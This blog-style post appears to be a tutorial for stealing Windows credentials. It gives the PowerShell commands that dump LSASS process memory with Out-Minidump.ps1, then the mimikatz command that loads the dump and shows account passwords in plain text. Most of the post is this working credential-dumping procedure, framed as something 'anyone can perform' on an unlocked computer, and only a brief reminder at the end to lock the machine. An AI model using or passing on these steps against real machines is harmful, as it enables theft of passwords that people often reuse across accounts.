Did you know that your Windows passwords are vulnerable and hackable in less than 5 minutes?
Yep, even in Windows 10, the method is still working nicely. The method is not new at all. So, let me show how you can test with your own just by using a simple exploitation tool and a PowerShell script. Anyone can perform this hacking when you left your computer unlocked. I’m not really going to explain the details, but just enough I go straight to the steps. Google is on your fingertips if you are keen to explore more.
Using PowerShell to perform memory dump
To perform the LSASS dump, we will use the PowerShell script, Out-Minidump.ps1. The flow of cmdlet will look like this:
. 'G:\USERFILES\Desktop\PowerShell Playground\Out-Minidump.ps1' # "dot sourcing" method to import function from the script Get-Process lsass | Out-Minidump # To perform the LSASS dump Copy-Item .\lsass_868.dmp 'G:\USERFILES\Desktop\PowerShell Playground' # Copy the dump file to desired location
Using mimikatz terminal program to view the passwords
As you can see,
lsass_868.dmp is the example of LSASS dump file captured using the PowerShell script. Now, it’s time we use the mimikatz terminal to load in the dump file as follows:
sekurlsa::minidump "G:\USERFILES\Desktop\PowerShell Playground\lsass_868.dmp"
Switching to MINIDUMP file, so now we can view the passwords. Now, run this command to display all the accounts and passwords available:
Tadaa… Now I can see my actual Microsoft Account username and password in a plain text. As you imagine, most of people nowadays are using the same password for almost everything. So, I expected you can picture all the consequences with this vulnerability…
The fact is that the password is encrypted but it’s useless as the implementation depends on two basic Win32 functions; LsaProtectMemory (the encryption function) and LsaUnprotectMemory (the decryption function). And Windows stores encrypted user passwords in memory without using one-way hash which is decryptable using LsaUnprotectMemory function to a plain text.
For more explanations and security advices, you might want to check the original article here. So, my bottom line here… Always keep your computer locked when you’re not using it.
Note: This article is just to remind me or anyone else to always be careful in whatever you do especially with anything to do with passwords and personal credential information.